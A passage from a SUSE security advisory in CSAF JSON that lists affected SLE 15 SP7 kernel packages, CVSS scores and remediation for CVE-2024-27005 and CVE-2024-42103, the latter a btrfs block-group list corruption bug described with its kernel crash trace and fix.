"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2024-27005"
},
{
"cve": "CVE-2024-42103",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-42103"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix adding block group to a reclaim list and the unused list during reclaim\n\nThere is a potential parallel list adding for retrying in\nbtrfs_reclaim_bgs_work and adding to the unused list. Since the block\ngroup is removed from the reclaim list and it is on a relocation work,\nit can be added into the unused list in parallel. When that happens,\nadding it to the reclaim list will corrupt the list head and trigger\nlist corruption like below.\n\nFix it by taking fs_info-\u003eunused_bgs_lock.\n\n [177.504][T2585409] BTRFS error (device nullb1): error relocating ch= unk 2415919104\n [177.514][T2585409] list_del corruption. next-\u003eprev should be ff1100= 0344b119c0, but was ff11000377e87c70. (next=3Dff110002390cd9c0)\n [177.529][T2585409] ------------[ cut here ]------------\n [177.537][T2585409] kernel BUG at lib/list_debug.c:65!\n [177.545][T2585409] Oops: invalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\n [177.555][T2585409] CPU: 9 PID: 2585409 Comm: kworker/u128:2 Tainted: G W 6.10.0-rc5-kts #1\n [177.568][T2585409] Hardware name: Supermicro SYS-520P-WTR/X12SPW-TF, BIOS 1.2 02/14/2022\n [177.579][T2585409] Workqueue: events_unbound btrfs_reclaim_bgs_work[btrfs]\n [177.589][T2585409] RIP: 0010:__list_del_entry_valid_or_report.cold+0x70/0x72\n [177.624][T2585409] RSP: 0018:ff11000377e87a70 EFLAGS: 00010286\n [177.633][T2585409] RAX: 000000000000006d RBX: ff11000344b119c0 RCX:0000000000000000\n [177.644][T2585409] RDX: 000000000000006d RSI: 0000000000000008 RDI:ffe21c006efd0f40\n [177.655][T2585409] RBP: ff110002e0509f78 R08: 0000000000000001 R09:ffe21c006efd0f08\n [177.665][T2585409] R10: ff11000377e87847 R11: 0000000000000000 R12:ff110002390cd9c0\n [177.676][T2585409] R13: ff11000344b119c0 R14: ff110002e0508000 R15:dffffc0000000000\n [177.687][T2585409] FS: 0000000000000000(0000) GS:ff11000fec880000(0000) knlGS:0000000000000000\n [177.700][T2585409] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [177.709][T2585409] CR2: 00007f06bc7b1978 CR3: 0000001021e86005 CR4:0000000000771ef0\n [177.720][T2585409] DR0: 0000000000000000 DR1: 0000000000000000 DR2:0000000000000000\n [177.731][T2585409] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:0000000000000400\n [177.742][T2585409] PKRU: 55555554\n [177.748][T2585409] Call Trace:\n [177.753][T2585409] \u003cTASK\u003e\n [177.759][T2585409] ? __die_body.cold+0x19/0x27\n [177.766][T2585409] ? die+0x2e/0x50\n [177.772][T2585409] ? do_trap+0x1ea/0x2d0\n [177.779][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.788][T2585409] ? do_error_trap+0xa3/0x160\n [177.795][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.805][T2585409] ? handle_invalid_op+0x2c/0x40\n [177.812][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.820][T2585409] ? exc_invalid_op+0x2d/0x40\n [177.827][T2585409] ? asm_exc_invalid_op+0x1a/0x20\n [177.834][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.843][T2585409] btrfs_delete_unused_bgs+0x3d9/0x14c0 [btrfs]\n\nThere is a similar retry_list code in btrfs_delete_unused_bgs(), but it is\nsafe, AFAICS. Since the block group was in the unused list, the used bytes\nshould be 0 when it was added to the unused list. Then, it checks\nblock_group-\u003e{used,reserved,pinned} are still 0 under the\nblock_group-\u003elock. So, they should be still eligible for the unused list,\nnot the reclaim list.\n\nThe reason it is safe there it\u0027s because because we\u0027re holding\nspace_info-\u003egroups_sem in write mode.\n\nThat means no other task can allocate from the block group, so while we\nare at deleted_unused_bgs() it\u0027s not possible for other tasks to\nallocate and deallocate extents from the block group, so it can\u0027t be\nadded to the unused list or the reclaim list by anyone else.\n\nThe bug can be reproduced by btrfs/166 after a few rounds. In practice\nthis can be hit when relocation cannot find more chunk space and ends\nwith ENOSPC.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-42103",
"url": "https://www.suse.com/security/cve/CVE-2024-42103"
},
{
"category": "external",
"summary": "SUSE Bug 1228490 for CVE-2024-42103",
"url": "https://bugzilla.suse.com/1228490"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2024-42103"
},
{
"cve": "CVE-2024-53070",
"ids": [
{
